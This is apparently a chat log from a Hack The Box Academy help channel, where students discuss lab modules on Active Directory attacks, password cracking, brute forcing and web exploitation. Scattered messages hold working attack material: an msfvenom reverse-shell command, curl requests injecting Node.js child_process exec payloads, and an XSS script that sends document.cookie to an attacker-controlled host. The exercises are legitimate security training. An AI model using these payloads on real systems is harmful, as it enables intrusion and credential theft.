COM Error Info:
    CCertRequest::Submit: Invalid pointer 0x80004003 (-2147467261 E_POINTER) 
LastStatus:
    The operation completed successfully. 0x0 (WIN32: 0) 
Suggested Cause:
    No suggestions. 

"

Any work around for this error?

That sounds like it's on the main site: read #welcome and follow instructions, you'll be able to access #boxes

encoding 1

encoding 1

encoding 1

Brother that's from several months ago

lmfao

I swear people don't know how to read timestamps

sorry bro

just one month

The other one was 4 months

And resolved by themselves 🙂

Look in the Note underneath the section "Identifying Keytab Files in Cronjobs"

Read the Note in the section "Identifying Keytab Files in Cronjobs"

Read the Note in the section "Identifying Keytab Files in Cronjobs" That will help you with the first step.

Read the Note in the section "Identifying Keytab Files in Cronjobs"

Can I dm you on this? I am using burp and changed the X-Header to the correct ip but still get invalid creds and can't see the flag

nvm solved

thanks mate I've already solved

Doing password attack labs - medium

• already got Dennis and Jason users. Also got passphrase for private key.

However, I can't login with ssh private key for root user. I got the error "permission denied (public key)". I did chmod 600 for private key.

Anyone pls pls help me? Highly appreciated

I'm in AD Enumeration & Attacks - Skills Assessment Part I
I got a Windows reverse shell , but I'm having issues while running certain cmdlets, powerview and binaries such as Mimikatz. I'm not receiving any output or error messages, and the netcat shell freezes when running mimikatz . how do i upgrade a windows reverse shell?

Hi, I am new to JavaScript. I went over the module and attempted the*** Whitebox Pentesting 101 Skills Assessment*** numerous times. However, I am still at a road block due to my lack of understanding and seeking some enlightenment. Any help will be greatly appreciated. 🙏

Firstly I am not sure if I got the payloads correctly. I derived at the payloads from the following 2 examples:

Example A1:
||curl http://0.0.0.0:21440/ping -X POST -d '{"debug":true, "ip": "{"ip": "127.0.0.1"}" }' -H "Content-Type: application/json"||

Example A2:
||curl http://0.0.0.0:21440/ping -X POST -d '{"debug": true, "ip": "127.0.0.1"}' -H "Content-Type: application/json"||

I observed that the POST data input was ||wrapped in single quotes '' inside json.parse('')|| and thereafter|| wrapped in backticks `` inside the eval() function||. I did some searching and seems like I do not have to craft the payload to close/open them evenly. Please correct me if I am wrong.
Information from the web: "The ||backticks ||indicate a template literal, which allows the expressions to be embeded within the string using ${}. The expression|| ${req.body.ip}|| is wrapped within the template literal and will be evaluated as a JavaScript expression."

Attempted payloads:
Lab URL: 64.227.46.56:30606||/ping||

||curl http://64.227.46.56:30606/ping -X POST -d '{"debug": true, "ip": " "; const { exec } = require("child_process"); exec("cat style.css > output.txt"); //"}' -H "Content-Type: application/json"
curl http://64.227.46.56:30606/ping -X POST -d '{"debug": true, "ip": " "; const { exec } = require("child_process"); exec("cat style.css > ./output.txt"); //"}' -H "Content-Type: application/json"
curl http://64.227.46.56:30606/ping -X POST -d '{"debug": true, "ip": " "; const { exec } = require("child_process"); exec("cat style.css > /var/www/html/output.txt"); //"}' -H "Content-Type: application/json"||

continuation...

||curl http://64.227.46.56:30606/ping -X POST -d '{"debug": true, "ip": " "; const { exec } = require("child_process"); exec("cat style.css > /tmp/output.txt"); //"}' -H "Content-Type: application/json"
curl http://64.227.46.56:30606/ping -X POST -d '{"debug": true, "ip": " "; const { exec } = require("child_process"); exec("cat /flag.txt > ./output.html"); //"}' -H "Content-Type: application/json"

curl http://64.227.46.56:30606/ping -X POST -d '{"debug": true, "ip": " "; var fs = require(\"fs\"); fs.readFile(\"flag.txt\", \"utf8\", (err, data) => { fs.writeFile(\"output.html\", data, (err) => { if (err) throw err; }); }); //"}' -H "Content-Type: application/json"

curl http://64.227.46.56:30606/ping -X POST -d '{"debug":true, "ip": "{"ip": "127.0.0.1"; var fs = require(\"fs\"); fs.readFile(\"flag.txt\", \"utf8\", (err, data) => { fs.writeFile(\"output.html\", data, (err) => { if (err) throw err; }); }); //"}' -H "Content-Type: application/json"||

Anyone?

Can anyone help me with the login brute force skills assessment module? Currently stuck in the very last task :/

Try searching the chats, I've seen a lot of tips from multiple people.

Already searched, hahahha thank you though

Yup, follow those tips, use your own logical thinking and you should be able to crack it lol

hey im at the last part of Password Attack hard lab trying to Pth with administrator hash but i cant do it any hint?

is that the hash which you got from dumping and extract the sams? @clear lion

yes

im trying with evil win

Try dumping the creds with secretsdump instead

I can't type wow

maybe you were using sam2dump?

yes

im going to try with secret

thax

I wonder if someone can explain why sam2dump doesn't do a good work

thanks a lot , they are totally different hashes

i was trying for the last 2 hours

It's better to hit the hashes on the very machine you extracted from, to check if they're valid. It's a quick false-positive check so you don't have to waste time

I will

Is it just me, or I've been having problem trying to execute .jsp reverse shell on tomcat using the payload generated by msfvenom. I've tried it twice on two different modules where I had to exploit tomcat, but I get this on visiting the payload.

So far, I've just been completing those modules with webshell -> reverse shell

Module: Attacking Common Applications -> Tomcat

are you uploading the right format for the payload (.war)?

msfvenom -p java/shell_reverse_tcp LHOST=10.10.x.x LPORT=9111 -f war -o shell.war
literally this generated payload

Does it connect to your listening port? If not then reset the box … could be a glitch

Solved it. Damn need to reset the machine and login again with private key

Played around a little bit, seems like it's just like that for java/shell_reverse_tcp, something wrong with the meterpreter payload, creating with this option tho- java/jsp_shell_reverse_tcp -f war -o shell.war does the trick of popping me a revshell

Is that initial payload used perhaps for certain environment?

What kind of bugs can be on a site that works with javascript, how can a database or any other entry point be open?

Or what methods do you use?

@deep tide

Feel free to verify and ask in #web or #red-team , and/or even in #hacker-lounge

Hi on the brute force part what managed to unblock ssh?

Is 120 minute the script Is on

What module

The 2 e

?

I'm asking what academy module are you working on

Login brute forcing

Check if another service is running, and brute that instead

The request of the exercices Is tò brute force ssh

Ssh sucks to brute

As it takes forever

Thinking out of the box is also something to follow, brute-forcing ssh is not feasible.

Oftentimes ssh password and ftp, SMB, etc... Passwords are the same

It's doable, but brute forcing ssh is only done as a very last resort

anyone else unable to spawn a target?

yep me

it works now

no for me the target doesn't spawn

It's working now

hello, i am working on Windows priv sec, i am not able to start the instance , HTB says to contact support if problem persists

?

https://academy.hackthebox.com/module/143/section/1421
Someone could help me with question 3 and 4 i dont really get it work with snaffler

i got the instance and the target, but unable to RDP into the target

yea me neither

i get black screen in the rdp

Active Directory Enumeration & Attacks ## ACL Enumeration

What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)

This is a terrible question. I know the 2 rights this user has using BloodHound. I let PowerView command run for over half an hour and the machine ended without me seeing the output. Can anyone help me spare some time here?

yo sorry im stucked a bit behind https://academy.hackthebox.com/module/143/section/1421

for the questions 3 and 4 I'm running snaffler but i dont get it

Show a screenshot of what you're doing.

.\snaffler.exe -d INLANEFREIGHT.LOCAL -s -v -o exercise.log

||(\\ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL\Department Shares\IT\Development\web.config||

I don't see the issue, you've found it.

i found the file but am trying to open it

Snaffler showed the output in the stdout for me.

i got it ty

It does show you the rights the user has on GPO management group, just that bloodhound doesn't give the exact name, me personally was not able to google it and find the resolved name for that ACE type as well. So you would have to refresh the machine, run the powerview command to get the ACE Type, would take 60-90 minutes

im doing bleeding edge vulns

im on print nightmare

when i try to generate payload with msfveom i get this error

act based on the error

its simple

i treid sudo

didnt work either

try smarter

yess

i got it.. wrong dir :D

thanks for da hel

p

Thank you so much 🤲

Exactly.

Funny how its not included here:
https://learn.microsoft.com/en-us/windows/win32/adschema/extended-rights

why is it failing to bind? .... :/

.

Make sure you're understanding and not just copy pasting 🙃

r u telling me?

yeah tbh im not unerstanding it the best rn

but now im just starting msf multi/handler to intercept the reverse shell on the target right?

Take breaks, Take your time.

Try to understand what failing to bind means

unable to to connect to a ip and port?

Close, more like unable to bind an IP and port

FYI, Metasploit, started the listener with it's default, even tho you made some mistakes.

well idk like i used what they used in the example

but idk why they used LHOST 172.16.5.225

isnt that supposed to be RHOST? since its a target ip

Which module-section?

this one

that im doing rn

its

on one line please

sorry, bad habit xd

AD enum and attacks module, section bleeding edge vulns printnightmare exploit

doing medium footprinting and even when using || run as administrator with found credentials on the sql server mamagement studio || it says by creds are invalid?

ive managed to get shell access on the php web shells section of shell attacks

but when i run a command i get this

yo im dum

dumb

really dumb

i was doing it from my local terminal, i did not connect to linux host

sorry for waisting ur time

I was looking at something and wodering if it's a typo on the module or, metasploit automatically set the LHOST to the other network interface. Bleeding-edge Vulnerabilities module btw.

i saw that too

was thinking i need to put my ip from ip a in there

lol

Do you get the same type of output? when trying to configure metasploit handler on the linux host sitting on the internal.

i do not, i get the normal output

ok i really do not know what else to do, im stuck on running the exploit im getting error that file cannout be found i was trynna not to ask here again cuz i think i am a little annoying but....

im trying to run the exploit, i started the smb server with the msfvenom payload and all but i cant seem to get it to work....

It's okay to ask, but only after you've made sure to go through the section again and done everything you can.

Also, review your smbserver.py command.

For extra help, look closely at the syntax provided in the module too

it looks the same as in the

module

i mean except that i added the path to the file

Your hint is, you can't host a file itself as a SMB Share

YES

thank you so much...

i got confused with them saying /path/to/backup.dll .........

someone who completed the module AD enumeration and attacks?

can anyone help with this

i want to ask how they completed this question. I am not sure if i did it with the intended way Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

use ldap filtering

I have completed it but idk if it was the intended way

i used 3 commands

i only used one

u can send me a dm if u want

check #welcome

Can anyone help with this?

which section

doing medium footprinting and even when using || run as administrator with found credentials on the sql server mamagement studio || it says by creds are invalid?

I'm RDP'd in

did u get the sa creds

yeah

oke let me check rq

thank you

Make sure you're using the right authentication mode. There are two of you read the section

but do I not need to run as admin first? That's where it is failing...

True. iirc, the creds is the way

|| right click "Run as admin" on sql server management studio, enter sa creds that are found on the system|| right?

IGNORE ME I AM SO DUMB!

Approximately how long can it take with FTP?

why do 1's look lik l's in windows default text WHY!!

Copy paste whenever you can 🤷

You can't when authorizing to admin

glad it worked for u

i was trying it and it worked for me so i was trying to figure out why it would not work

Need help on the brute forcing part🥲

Doing Windows Privilege Escalation Skills Assessment - Part II and finished it except for the 1st question

Find left behind cleartext credentials for the iamtheadministrator domain admin account.

any help is appreciated

web attacks skills assessment - after spending hours on different injects and feeling like losing my mind as the server was seeming unresponsive I finally got this flag. Come to find out it wasn't me per-se, but rather something with my network connection (this assessment is spun up on a public IP and does not require a VPN connection to the lab). I switched my wifi connection from my home wifi to a hotspot on my phone and presto!

are you doing that harry one?

lol

hello guys. I'm doing the module for SQLmap and now I'm in the part for bypassing defences, currenctly stuck on the first flag for the anti-csrf token bypass. In the "lesson" nothing is related on how to pratically find those tokens (or caracteristics) and properly set the command in the terminal. Could someone help me?

I think i'll fun in this part

I am doing the brute force exercise of account b.gates. Ssh and ftp

sorted!

AD enumeration and attacks is the longest module right?

That one should be fairly straight forward, just follow the wordlist which you've prepared and refine it, remove duplicates and other complexity related stuff.

Yes

yeah

but its not that long tbh, its also imo the most fun one

since u learn the most from it

So i Need tò prépare a wordlist myself jus mt take rockyou.txt?Because I used rockyou I removed the elements of size less than 8 and made other changes but nothing

yea am reviewing all what i learnt from active directory here

can u just ask the question? we cannot guess where are u

or what are u trying

hi

No, not rockyou. just use cupp

That's what they taught you in the module right?

generating wordlist based on the username

Pwned AD Enum II 🙂

How was it

Which ACE entry can be leveraged to perform a targeted Kerberoasting attack?
For this question isnt GenericWrite also able to perform Kerberoasting Attack?

@mellow whale Hey awesome AD Module man! Assessment P II was beautiful

Oh it was sick

im looking for some help with password attacks, question: Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

I got hung up on one part for like over an hour lol

where are u stuck

The problem is that in the exercices the already gives me the username and only that, they did not give me information such as the name or other What cupp needs

Please help me here... I'm in Exploiting Web Vulnerabilities in Thick-Client Applications module.
Been stuck on it for weeks, and already finished the entire module..
I follow the steps, but when I try to compile: C:\> javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java - gives me 31 errors in the code...
Now, I changed only what they said, so I have no clue...

as i told can u just send the question and the module with the section?

and ask where are u stuck

It Is in the basic tools module brute force chapter service autentication brute forcing

anyone have any livestreams/videos of someone just doing hard vuln machines or something? I learn by watching other people do stuff and it would give me some motivation, but I have no clue on what to search for to find it

u have to use cupp

With thé username thé gave to me rigtht

https://ippsec.rocks/?#

many thanks 😄

just search what u want to learn

the section gives u the info to make the wordlist

Okay cool

XSS skills assessment
i have script.js on the /tmp/tmpserver directory on my vm, cat script.js returns this:
new Image().src='http://mytun0/index.php?c='+document.cookie
i have index.php on the same dir too.
||i know the vulnerable parameter is the comment form|| im trying to run <script src=http://mytun0/script.js></script>
on the comments form but i get nothing in return on the php server.
can someone please tell me what am i missing here?

nevermind, i got the flag, i honestly dont know what was doing wrong, the flag just showed up after a couple tries

<@&861185840277487616>

Much appreciated.

https://academy.hackthebox.com/module/147/section/1320 I just cannot figure it out. Would anyone give me a hint? I tried brute forcing Will & Kira on every service running on the host but still no success.

there are some lowly developed websites which requires you to login
so can we bypass login?
or get id and password to login?
by web scrappers , brute force or any means

yo

is that real

well the user was actually kira which i had to brute force. i just forgot to mutate the right list to the kira password